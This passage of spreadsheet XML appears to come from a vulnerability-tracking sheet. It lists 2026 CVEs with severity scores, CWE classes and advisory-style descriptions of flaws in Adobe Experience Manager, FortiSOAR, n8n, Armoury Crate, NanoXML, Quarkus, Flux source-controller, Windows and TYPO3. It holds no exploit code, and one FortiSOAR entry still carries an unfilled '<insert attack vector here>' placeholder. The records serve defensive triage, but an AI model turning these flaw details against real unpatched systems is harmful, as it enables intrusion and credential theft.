t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1439" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1439" s="5" t="inlineStr" /><c r="R1439" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1439"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39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75734</t></is></c></row><row r="1440"><c r="A1440" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1440" s="5" t="inlineStr"><is><t>CVE-2026-75735</t></is></c><c r="D1440" s="5" t="n"><v>5.4</v></c><c r="E1440" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1440" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1440" s="5" t="inlineStr" /><c r="H1440" s="5" t="n"><v>0.003</v></c><c r="I1440" s="5" t="inlineStr" /><c r="J1440" s="5" t="inlineStr" /><c r="K1440" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1440" s="5" t="inlineStr" /><c r="M1440" s="5" t="inlineStr" /><c r="N1440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1440" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1440" s="5" t="inlineStr" /><c r="R1440" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1440"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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75735</t></is></c></row><row r="1441"><c r="A1441" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1441" s="5" t="inlineStr"><is><t>CVE-2026-75736</t></is></c><c r="D1441" s="5" t="n"><v>5.4</v></c><c r="E1441" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1441" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1441" s="5" t="inlineStr" /><c r="H1441" s="5" t="n"><v>0.003</v></c><c r="I1441" s="5" t="inlineStr" /><c r="J1441" s="5" t="inlineStr" /><c r="K1441" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1441" s="5" t="inlineStr" /><c r="M1441" s="5" t="inlineStr" /><c r="N1441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1441" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1441" s="5" t="inlineStr" /><c r="R1441" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1441"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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75736</t></is></c></row><row r="1442"><c r="A1442" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1442" s="5" t="inlineStr"><is><t>CVE-2026-75737</t></is></c><c r="D1442" s="5" t="n"><v>5.4</v></c><c r="E1442" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1442" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1442" s="5" t="inlineStr" /><c r="H1442" s="5" t="n"><v>0.003</v></c><c r="I1442" s="5" t="inlineStr" /><c r="J1442" s="5" t="inlineStr" /><c r="K1442" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1442" s="5" t="inlineStr" /><c r="M1442" s="5" t="inlineStr" /><c r="N1442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1442" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1442" s="5" t="inlineStr" /><c r="R1442" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1442"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75737</t></is></c></row><row r="1443"><c r="A1443" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1443" s="5" t="inlineStr"><is><t>CVE-2026-75738</t></is></c><c r="D1443" s="5" t="n"><v>5.4</v></c><c r="E1443" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1443" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1443" s="5" t="inlineStr" /><c r="H1443" s="5" t="n"><v>0.003</v></c><c r="I1443" s="5" t="inlineStr" /><c r="J1443" s="5" t="inlineStr" /><c r="K1443" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1443" s="5" t="inlineStr" /><c r="M1443" s="5" t="inlineStr" /><c r="N1443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1443" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1443" s="5" t="inlineStr" /><c r="R1443" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1443"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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75738</t></is></c></row><row r="1444"><c r="A1444" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1444" s="5" t="inlineStr"><is><t>CVE-2026-75739</t></is></c><c r="D1444" s="5" t="n"><v>5.4</v></c><c r="E1444" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1444" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1444" s="5" t="inlineStr" /><c r="H1444" s="5" t="n"><v>0.003</v></c><c r="I1444" s="5" t="inlineStr" /><c r="J1444" s="5" t="inlineStr" /><c r="K1444" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1444" s="5" t="inlineStr" /><c r="M1444" s="5" t="inlineStr" /><c r="N1444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1444" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1444" s="5" t="inlineStr" /><c r="R1444" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1444"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75739</t></is></c></row><row r="1445"><c r="A1445" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1445" s="5" t="inlineStr"><is><t>CVE-2026-75740</t></is></c><c r="D1445" s="5" t="n"><v>5.4</v></c><c r="E1445" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1445" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1445" s="5" t="inlineStr" /><c r="H1445" s="5" t="n"><v>0.003</v></c><c r="I1445" s="5" t="inlineStr" /><c r="J1445" s="5" t="inlineStr" /><c r="K1445" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1445" s="5" t="inlineStr" /><c r="M1445" s="5" t="inlineStr" /><c r="N1445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1445" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1445" s="5" t="inlineStr" /><c r="R1445" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1445"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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75740</t></is></c></row><row r="1446"><c r="A1446" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1446" s="5" t="inlineStr"><is><t>CVE-2026-75741</t></is></c><c r="D1446" s="5" t="n"><v>5.4</v></c><c r="E1446" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1446" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1446" s="5" t="inlineStr" /><c r="H1446" s="5" t="n"><v>0.003</v></c><c r="I1446" s="5" t="inlineStr" /><c r="J1446" s="5" t="inlineStr" /><c r="K1446" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1446" s="5" t="inlineStr" /><c r="M1446" s="5" t="inlineStr" /><c r="N1446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1446" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1446" s="5" t="inlineStr" /><c r="R1446" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1446"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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75741</t></is></c></row><row r="1447"><c r="A1447" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1447" s="5" t="inlineStr"><is><t>CVE-2026-75742</t></is></c><c r="D1447" s="5" t="n"><v>5.4</v></c><c r="E1447" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1447" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1447" s="5" t="inlineStr" /><c r="H1447" s="5" t="n"><v>0.003</v></c><c r="I1447" s="5" t="inlineStr" /><c r="J1447" s="5" t="inlineStr" /><c r="K1447" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1447" s="5" t="inlineStr" /><c r="M1447" s="5" t="inlineStr" /><c r="N1447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1447" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1447" s="5" t="inlineStr" /><c r="R1447" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1447"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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75742</t></is></c></row><row r="1448"><c r="A1448" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1448" s="5" t="inlineStr"><is><t>CVE-2026-79905</t></is></c><c r="D1448" s="5" t="n"><v>5.4</v></c><c r="E1448" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1448" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1448" s="5" t="inlineStr" /><c r="H1448" s="5" t="n"><v>0.003</v></c><c r="I1448" s="5" t="inlineStr" /><c r="J1448" s="5" t="inlineStr" /><c r="K1448" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1448" s="5" t="inlineStr" /><c r="M1448" s="5" t="inlineStr" /><c r="N1448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1448" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1448" s="5" t="inlineStr" /><c r="R1448" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1448" s="5" t="inlineStr"><is><t>Adobe Experience Manager is affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.</t></is></c><c r="T1448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79905</t></is></c></row><row r="1449"><c r="A1449" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1449" s="5" t="inlineStr"><is><t>CVE-2026-84385</t></is></c><c r="D1449" s="5" t="n"><v>5.4</v></c><c r="E1449" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1449" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1449" s="5" t="inlineStr" /><c r="H1449" s="5" t="n"><v>0.001</v></c><c r="I1449" s="5" t="inlineStr" /><c r="J1449" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1449" s="5" t="inlineStr" /><c r="L1449" s="5" t="inlineStr" /><c r="M1449" s="5" t="inlineStr" /><c r="N1449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1449" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1449" s="5" t="inlineStr" /><c r="R1449" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1449" s="5" t="inlineStr"><is><t>A improper access control vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.6, FortiSOAR PaaS 7.5.0 through 7.5.3, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.6, FortiSOAR on-premise 7.5.0 through 7.5.3, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to escalation of privilege via &lt;insert attack vector here&gt;</t></is></c><c r="T1449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t></is></c></row><row r="1450"><c r="A1450" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1450" s="5" t="inlineStr"><is><t>CVE-2026-86996</t></is></c><c r="D1450" s="5" t="n"><v>5.4</v></c><c r="E1450" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1450" s="5" t="inlineStr" /><c r="H1450" s="5" t="n"><v>0.002</v></c><c r="I1450" s="5" t="inlineStr" /><c r="J1450" s="5" t="inlineStr" /><c r="K1450" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1450" s="5" t="inlineStr"><is><t>npm:n8n</t></is></c><c r="M1450" s="5" t="inlineStr"><is><t>2.37.7, 2.38.2</t></is></c><c r="N1450" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O1450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1450" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1450" s="5" t="inlineStr" /><c r="R1450" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1450" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the workflow setting named This workflow can be called by was enforced by the Execute Workflow node but not when a workflow was attached to an Agent as a tool. A user able to build an Agent could invoke a restricted workflow and read its returned data. The affected path is packages/cli/src/modules/agents/tools/workflow-tool-factory.ts, where executeWorkflow omitted SubworkflowPolicyChecker.checkForProject. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="T1450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t></is></c></row><row r="1451"><c r="A1451" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1451" s="5" t="inlineStr"><is><t>CVE-2026-12962</t></is></c><c r="D1451" s="5" t="n"><v>5.3</v></c><c r="E1451" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1451" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1451" s="5" t="inlineStr" /><c r="H1451" s="5" t="n"><v>0.004</v></c><c r="I1451" s="5" t="inlineStr" /><c r="J1451" s="5" t="inlineStr" /><c r="K1451" s="5" t="inlineStr" /><c r="L1451" s="5" t="inlineStr" /><c r="M1451" s="5" t="inlineStr" /><c r="N1451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1451" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1451" s="5" t="inlineStr" /><c r="R1451" s="5" t="inlineStr"><is><t>CWE-942</t></is></c><c r="S1451" s="5" t="inlineStr"><is><t>A Permissive Cross-domain Security Policy with Untrusted Domains in Armoury Crate allows a remote user to obtain a local user's NTLM hash by convincing the user to visit a crafted web page that sends a request containing a UNC path to the application's local service endpoint.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12962</t></is></c></row><row r="1452"><c r="A1452" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1452" s="5" t="inlineStr"><is><t>CVE-2026-19614</t></is></c><c r="D1452" s="5" t="n"><v>5.3</v></c><c r="E1452" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1452" s="5" t="inlineStr"><is><t>64c5ae8f-7972-4697-86a0-7ada793ac795</t></is></c><c r="G1452" s="5" t="inlineStr" /><c r="H1452" s="5" t="n"><v>0.002</v></c><c r="I1452" s="5" t="inlineStr" /><c r="J1452" s="5" t="inlineStr" /><c r="K1452" s="5" t="inlineStr" /><c r="L1452" s="5" t="inlineStr" /><c r="M1452" s="5" t="inlineStr" /><c r="N1452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1452" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1452" s="5" t="inlineStr" /><c r="R1452" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S1452" s="5" t="inlineStr"><is><t>The API is prone to XML external entity (XXE) injection. By default, XML external entity support is enabled.
This issue affects NanoXML: 2.2.3.</t></is></c><c r="T1452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19614</t></is></c></row><row r="1453"><c r="A1453" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1453" s="5" t="inlineStr"><is><t>CVE-2026-19625</t></is></c><c r="D1453" s="5" t="n"><v>5.3</v></c><c r="E1453" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1453" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1453" s="5" t="inlineStr" /><c r="H1453" s="5" t="n"><v>0.003</v></c><c r="I1453" s="5" t="inlineStr" /><c r="J1453" s="5" t="inlineStr" /><c r="K1453" s="5" t="inlineStr" /><c r="L1453" s="5" t="inlineStr" /><c r="M1453" s="5" t="inlineStr" /><c r="N1453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1453" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1453" s="5" t="inlineStr" /><c r="R1453" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1453" s="5" t="inlineStr"><is><t>When a Quarkus application has multiple endpoints secured by individual OIDC provider tenants, such as "/oidc-provider1" that is secured by the OIDC Provider 1 and "/oidc-provider2" that is secured by the OIDC Provider 2, and an optional token introspection cache is also enabled, then a valid token issued by the OIDC Provider 1 that can be used to access "/oidc-provider1" can also be used to access "/oidc-provider2" that is secured by another OIDC Provider 2.</t></is></c><c r="T1453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19625</t></is></c></row><row r="1454"><c r="A1454" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1454" s="5" t="inlineStr"><is><t>CVE-2026-33389</t></is></c><c r="D1454" s="5" t="n"><v>5.3</v></c><c r="E1454" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1454" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1454" s="5" t="inlineStr" /><c r="H1454" s="5" t="n"><v>0.001</v></c><c r="I1454" s="5" t="inlineStr" /><c r="J1454" s="5" t="inlineStr" /><c r="K1454" s="5" t="inlineStr" /><c r="L1454" s="5" t="inlineStr" /><c r="M1454" s="5" t="inlineStr" /><c r="N1454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1454" s="5" t="inlineStr" /><c r="R1454" s="5" t="inlineStr"><is><t>CWE-671</t></is></c><c r="S1454" s="5" t="inlineStr"><is><t>An improper certificate/host key validation vulnerability was discovered in the Smart Polling functionality, which established encrypted connections to target devices without validating the remote host's identity, and no option was provided to enable it. A man-in-the-middle attacker positioned between a sensor and a polled device can, during a polling session, impersonate the device and intercept the communication, including the credentials used to access it. The captured credentials can then be replayed to authenticate against the device itself or against other devices sharing the same credentials, allowing the attacker to access and tamper with the device's data and to disrupt its operations.</t></is></c><c r="T1454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33389</t></is></c></row><row r="1455"><c r="A1455" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1455" s="5" t="inlineStr"><is><t>CVE-2026-33391</t></is></c><c r="D1455" s="5" t="n"><v>5.3</v></c><c r="E1455" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1455" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1455" s="5" t="inlineStr" /><c r="H1455" s="5" t="n"><v>0.003</v></c><c r="I1455" s="5" t="inlineStr" /><c r="J1455" s="5" t="inlineStr" /><c r="K1455" s="5" t="inlineStr" /><c r="L1455" s="5" t="inlineStr" /><c r="M1455" s="5" t="inlineStr" /><c r="N1455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1455" s="5" t="inlineStr" /><c r="R1455" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1455" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Smart Polling configuration functionality due to insufficient validation of user privileges. An authenticated user with limited privileges can remotely bypass the intended access control of the web management interface and modify the Smart Polling discovery configuration. This allows the attacker to disrupt the visibility of assets in the monitored network.</t></is></c><c r="T1455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33391</t></is></c></row><row r="1456"><c r="A1456" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1456" s="5" t="inlineStr"><is><t>CVE-2026-47680</t></is></c><c r="D1456" s="5" t="n"><v>5.3</v></c><c r="E1456" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1456" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1456" s="5" t="inlineStr" /><c r="H1456" s="5" t="n"><v>0.003</v></c><c r="I1456" s="5" t="inlineStr" /><c r="J1456" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1456" s="5" t="inlineStr" /><c r="L1456" s="5" t="inlineStr" /><c r="M1456" s="5" t="inlineStr" /><c r="N1456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1456" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1456" s="5" t="inlineStr" /><c r="R1456" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1456" s="5" t="inlineStr"><is><t>The source-controller is a Kubernetes operator, specialised in artifacts acquisition from external sources such as Git, OCI, Helm repositories and S3-compatible buckets. In versions 0.0.17 through 1.8.4, an actor with the ability to influence the contents of a bucket referenced by a `Bucket` resource can cause source-controller to write fetched object data to paths outside the per-reconciliation working directory. The corruption surface is bounded by source-controller's own and downstream Flux controllers' digest verification: source-controller verifies stored artifact digests during reconciliation and rebuilds on divergence; consumers (kustomize-controller, helm-controller) verify the digest of fetched artifacts and reject mismatches. These checks prevent a manipulated artifact from reaching the cluster, but an attacker can still write files anywhere the source-controller pod has permission to write. Separately, a user with permission to create or update `GitRepository` resources can cause source-controller to test for the existence of paths outside the cloned repository. Because the result is exposed via the resource's status, this allows limited enumeration of file paths on the controller pod. This surface exists only on source-controller v1.6.0 and later, where the sparse-checkout feature was introduced. This vulnerability was fixed in source-controller v1.8.5. There is no in-product workaround. Users should upgrade to a patched version. As a defense-in-depth measure for the GitRepository sparse-checkout surface, a `ValidatingAdmissionPolicy` (or a third-party policy engine such as Kyverno or OPA Gatekeeper) can be deployed to reject `GitRepository` resources whose `.spec.sparseCheckout` entries contain `..` or absolute path segments.</t></is></c><c r="T1456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t></is></c></row><row r="1457"><c r="A1457" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1457" s="5" t="inlineStr"><is><t>CVE-2026-70575</t></is></c><c r="D1457" s="5" t="n"><v>5.3</v></c><c r="E1457" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1457" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1457" s="5" t="inlineStr" /><c r="H1457" s="5" t="n"><v>0.008</v></c><c r="I1457" s="5" t="inlineStr" /><c r="J1457" s="5" t="inlineStr" /><c r="K1457" s="5" t="inlineStr" /><c r="L1457" s="5" t="inlineStr" /><c r="M1457" s="5" t="inlineStr" /><c r="N1457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1457" s="5" t="inlineStr" /><c r="R1457" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1457" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Schannel allows an authorized attacker to deny service over a network.</t></is></c><c r="T1457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70575</t></is></c></row><row r="1458"><c r="A1458" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1458" s="5" t="inlineStr"><is><t>CVE-2026-77132</t></is></c><c r="D1458" s="5" t="n"><v>5.3</v></c><c r="E1458" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1458" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G1458" s="5" t="inlineStr" /><c r="H1458" s="5" t="n"><v>0.004</v></c><c r="I1458" s="5" t="inlineStr" /><c r="J1458" s="5" t="inlineStr" /><c r="K1458" s="5" t="inlineStr" /><c r="L1458" s="5" t="inlineStr" /><c r="M1458" s="5" t="inlineStr" /><c r="N1458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1458" s="5" t="inlineStr" /><c r="R1458" s="5" t="inlineStr"><is><t>CWE-200, CWE-862</t></is></c><c r="S1458" s="5" t="inlineStr"><is><t>It has been discovered that several AJAX routes used for the backend localization wizard failed to perform authorization checks. This allowed authenticated, low-privileged backend users to access information about records and content elements that fall outside of their permitted range. Exploiting this vulnerability requires a low-privileged backend user account. This issue affects TYPO3 CMS versions 10.0.0-10.4.59, 11.0.0-11.5.53, 12.0.0-12.4.48, 13.0.0-13.4.34 and 14.0.0-14.3.6.</t></is></c><c r="T1458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77132</t></is></c></row><row r="1459"><c r="A1459" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1459" s="5" t="inlineStr"><is><t>CVE-2026-78446</t></is></c><c r="D1459" s="5" t="n"><v>5.3</v></c><c r="E1459" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1459" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1459" s="5" t="inlineStr" /><c r="H1459" s="5" t="n"><v>0.006</v></c><c r="I1459" s="5" t="inlineStr" /><c r="J1459" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1459"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59" s="5" t="inlineStr" /><c r="M1459" s="5" t="inlineStr" /><c r="N1459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1459" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1459" s="5" t="inlineStr" /><c r="R1459" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1459" s="5" t="inlineStr"><is><t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t></is></c><c r="T1459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t></is></c></row><row r="1460"><c 